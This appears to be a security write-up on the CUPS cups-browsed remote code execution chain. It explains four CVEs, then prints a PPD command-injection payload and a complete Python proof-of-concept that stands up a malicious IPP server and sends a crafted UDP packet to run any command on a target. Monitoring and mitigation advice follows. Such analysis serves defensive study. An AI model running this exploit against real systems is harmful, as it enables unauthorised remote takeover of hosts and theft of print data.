CUPS RCE

Overview:

CUPS Vulnerabilities: Remote Exploitation Chain.

Recently, a series of critical vulnerabilities were discovered in CUPS (Common Unix Printing System), a software suite for managing printers in Linux and Unix systems. These vulnerabilities, disclosed by security researcher Simone Margaritelli, could allow attackers to execute commands remotely, hijack printing services, and even gain control over the system.

Why this can posses a high risk to a company's posture?

Exploiting these CUPS vulnerabilities can let an attacker see all the print jobs and documents. But why is this such a big deal?

Why can attackers see printed documents?

When an attacker takes control of the CUPS print server, they can intercept every document sent to the printer. This includes invoices, contracts, personal info—anything people print.

Why does this matter for businesses?

Companies print sensitive stuff all the time. Think about contracts, financial reports, or personal data. If an attacker sees these, they can steal secrets, money, or personal identities.

Why is this dangerous?

Because the attacker can:

  • Steal confidential information: They get access to valuable data.

  • Change important documents: They might alter contracts or invoices, causing legal or financial problems.

  • Stay hidden: Print servers aren't always watched closely, so attackers might not get caught quickly.

Why might this go unnoticed?

Many companies don't monitor their printers for security issues. Attackers exploit this, quietly collecting data over time.

Why should we care?

Because the impact is huge:

  • Data breaches: Leaked info can harm a company's reputation.

  • Financial loss: Stolen or altered documents can lead to money loss.

  • Legal trouble: Exposing personal data might break laws like GDPR.

This post will break down how these vulnerabilities work, particularly focusing on how they impact CUPS and its component cups-browsed. We will also cover the technical details of the vulnerabilities (CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, CVE-2024-47177), and their potential consequences.

What Is CUPS and CUPS-browsed?

CUPS stands for the Common Unix Printing System. It's a modular printing system for Unix-like operating systems that allows a computer to act as a print server. A CUPS server manages print jobs and queues, and it uses IPP (Internet Printing Protocol) to handle client-server communication.

cups-browsed is a CUPS component that automatically discovers and manages network printers. It listens on UDP port 631 to detect printers via network advertisements like mDNS or DNS-SD. This convenience feature, while useful, opens up significant security risks when improperly handled.

Breakdown:

The vulnerabilities

There are four key vulnerabilities that expose systems using CUPS and cups-browsed to remote attack. These can lead to arbitrary command execution, potentially compromising the entire system.

CVE-2024-47176: Unrestricted Packet Processing on UDP Port 631

This vulnerability arises because cups-browsed listens on UDP port 631 and accepts any incoming data without proper validation. An attacker can send a specially crafted packet to this port, causing CUPS to make an IPP request to a malicious server. This is the initial entry point that makes the rest of the vulnerabilities exploitable.

Technical Details:

  • Issue: Lack of validation on incoming network traffic.

  • Impact: Forces CUPS to connect to an attacker's IPP server, allowing malicious data to be injected into the system.

CVE-2024-47076: Improper Validation of IPP Attributes in libcupsfilters

Once the attacker’s server sends back IPP attributes, the CUPS library libcupsfilters fails to properly validate or sanitize these attributes. This means an attacker can provide malicious IPP data, which is then processed by CUPS as if it were legitimate.

Technical Details:

  • Issue: No input validation for IPP attributes.

  • Impact: Attacker-controlled data flows directly into the CUPS system, setting the stage for more dangerous exploits.

CVE-2024-47175: Injection of Malicious Data into PPD Files

This vulnerability involves libppd, a library used to generate PPD (PostScript Printer Description) files. These files describe printer capabilities and can also contain commands for the printer to execute. The problem is that libppd doesn’t validate the IPP data it writes into these PPD files, allowing an attacker to insert malicious commands.

Technical Details:

  • Issue: IPP attributes are written to PPD files without proper sanitation.

  • Impact: Allows the injection of commands directly into the PPD file, which will be executed when a print job is processed.

CVE-2024-47177: Command Injection via Foomatic-rip

The most critical vulnerability is in the Foomatic-rip filter, a tool used to convert print data into a format the printer can understand. It accepts a parameter called FoomaticRIPCommandLine, which allows commands to be run on the system. This can be exploited by inserting malicious commands into the PPD file, causing the system to execute arbitrary code when processing a print job.

Technical Details:

  • Issue: FoomaticRIPCommandLine parameter allows for arbitrary command execution.

  • Impact: Full remote command execution on the system, effectively giving the attacker control of the system.

Exploit Flow: How it works?

Here’s how an attacker can chain these vulnerabilities together to gain control of a system:

  1. Send Malicious UDP Packet: The attacker sends a crafted UDP packet to port 631. This triggers cups-browsed to contact the attacker’s IPP server for more information.

  2. Crafted IPP Response: The attacker’s IPP server sends back malicious IPP attributes. These attributes include payloads that will be written into PPD files.

  3. PPD File Injection: The system processes the attacker’s IPP response and writes the attributes into a temporary PPD file. Since the IPP data is not validated, this file now contains dangerous commands.

  4. Foomatic-rip Command Execution: When a print job is sent to the printer, the system executes the commands stored in the PPD file via Foomatic-rip, resulting in arbitrary code execution on the target system.

Payload example

An attacker might inject a command like this into a PPD file:

*FoomaticRIPCommandLine: "mkdir /tmp/pwned"
*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 foomatic-rip"

This command creates a directory called /tmp/pwned, proving that the attacker can execute arbitrary commands on the system.

This PoC script demonstrates how an attacker can set up a malicious IPP server that exploits the FoomaticRIPCommandLine vulnerability to inject and execute arbitrary commands.

Github repo: https://github.com/0xCZR1/CUPS-RCE

import logging
import socket
import threading
import time
import sys
from ippserver.server import IPPServer, IPPRequestHandler
from ippserver.behaviour import StatelessPrinter
from ippserver.constants import OperationEnum, StatusCodeEnum, SectionEnum, TagEnum
from ippserver.request import IppRequest

# IPP server lifecycle manager
class IPPServerManager:
    def __init__(self, server_instance):
        self.server_instance = server_instance
        self.server_thread = None

    def __enter__(self):
        print(f"Starting IPP server at {self.server_instance.server_address}")
        self.server_thread = threading.Thread(target=self.server_instance.serve_forever, daemon=True)
        self.server_thread.start()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        print("Stopping the server...")
        self.server_instance.shutdown()
        self.server_thread.join()

# Malicious printer class
class PrinterPwned(StatelessPrinter):
    def __init__(self, command):
        self.command = command
        super(PrinterPwned, self).__init__()

    def handle_postscript(self, req, psfile):
        print("Simulated postscript processing. Payload delivered.")

    def printer_list_attributes(self):
        attributes = super().printer_list_attributes()
        attributes.update({
            (SectionEnum.printer, b'printer-more-info', TagEnum.uri): [
                f'"\n*FoomaticRIPCommandLine: "{self.command}"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'.encode()
            ]
        })
        return attributes

    def operation_printer_list_response(self, req, _psfile):
        print("\ntarget connected, sending payload ...")
        attributes = self.printer_list_attributes()
        return IppRequest(self.version, StatusCodeEnum.ok, req.request_id, attributes)

# Send a malicious UDP packet to announce the malicious printer
def send_browsed_packet(ip, port, ipp_server_host, ipp_server_port):
    print(f"Sending UDP packet to {ip}:{port}...")
    printer_type = 2
    printer_state = '3'
    printer_uri = f'http://{ipp_server_host}:{ipp_server_port}/printers/EVILCUPS'
    printer_location = '"Pwned Location"'
    printer_info = '"Pwned Printer"'
    printer_model = '"HP LaserJet 1020"'
    packet = f"{printer_type:x} {printer_state} {printer_uri} {printer_location} {printer_info} {printer_model} \n"
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(packet.encode('utf-8'), (ip, port))

def run(server):
    with IPPServerManager(server):
        try:
            while True:
                time.sleep(0.5)
        except KeyboardInterrupt:
            print("Server interrupted.")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <LOCAL_HOST> <TARGET_HOST> <COMMAND>")
        sys.exit(1)

    SERVER_HOST = sys.argv[1]
    SERVER_PORT = 12349
    TARGET_HOST = sys.argv[2]
    COMMAND = sys.argv[3]

    server = IPPServer((SERVER_HOST, SERVER_PORT), IPPRequestHandler, PrinterPwned(COMMAND))
    threading.Thread(target=run, args=(server,)).start()

    TARGET_PORT = 631
    send_browsed_packet(TARGET_HOST, TARGET_PORT, SERVER_HOST, SERVER_PORT)

Attack Flow

  1. Target Discovery: The attacker sends a malicious UDP packet to the target on port 631, exploiting the cups-browsed component to initiate an IPP request back to the attacker’s IPP server.

  2. Response Manipulation: The attacker’s IPP server responds with carefully crafted PPD attributes, including FoomaticRIPCommandLine.

  3. Command Injection: When a print job is sent to the malicious printer, the PPD is processed, and the attacker’s command is executed.

Attack Surface Analysis:

CUPS is often enabled by default on Linux systems, and port 631 is typically exposed, making it an easy target for attackers. Because CUPS and IPP are widely deployed, especially in enterprise environments, this vulnerability has a significant attack surface, particularly in environments where printers are accessible over the network.

  • Remote Accessibility: Systems exposing port 631 are vulnerable to remote exploitation, especially if accessible from the internet. This makes it an ideal vector for mass exploitation using tools like Shodan to identify targets.

  • Local Networks: In local networks, attackers can exploit these flaws to compromise devices, move laterally, and potentially access sensitive data.

Exploitability Across Environments

  • Servers: In datacenter environments, print servers that expose CUPS may allow attackers to execute commands and escalate privileges.

  • Personal Computers: Personal Linux systems with default CUPS installations could be vulnerable to local or remote attackers on shared networks.

  • IoT Devices: Devices relying on CUPS for printing, including IoT setups, are potential targets if network configurations are insecure.

Monitoring

  1. Monitor UDP Traffic on Port 631: Use network monitoring tools like Wireshark or tcpdump to inspect UDP traffic on port 631 for unusual IPP requests or malformed packets.

  2. Logging: Enable CUPS debug logs and monitor for unknown printers being added automatically or sudden changes in PPD files.

  3. IDS/IPS Rules: Create signatures for Snort or Suricata to detect malformed IPP requests and monitor for FoomaticRIPCommandLine exploits.

Mitigation

  1. Disable cups-browsed: If you don’t need cups-browsed, disable it to eliminate exposure.

    sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed

  2. Firewall Configuration: Deny inbound traffic to UDP port 631 from unknown sources. Implement firewall rules to block unauthorized access to the cups-browsed service from external networks.

    For example, using iptables on Linux:

    sudo iptables -A INPUT -p udp --dport 631 -s [trusted_ip] -j ACCEPT
sudo iptables -A INPUT -p udp --dport 631 -j DROP

    This setup allows only specified sources to communicate over UDP port 631 while denying all others.

Real-world case

Attackers can leverage these vulnerabilities to:

  • Install Backdoors: By exploiting command injection, attackers could persist on the system through malicious printers or scripts executed during print jobs.

  • Network Scanning Tools: Tools like Shodan can help attackers find exposed printers with port 631 open, making this a low-effort, high-reward attack vector.

  • Data Exfiltration: Attackers could intercept or manipulate print jobs to capture sensitive information (e.g., financial documents, legal contracts).

Conclusion:

The vulnerabilities in CUPS demonstrate the dangers of overlooked network services and their default configurations. By exploiting weaknesses in the IPP protocol and PPD handling, attackers can execute arbitrary commands on vulnerable systems, making CUPS an attractive target for RCE attacks. It’s critical to patch systems, monitor network traffic, and restrict access to vulnerable services to mitigate these risks.

Material used:

PreviousPuppy Write-Up - HTBNextCrackmapexec

Last updated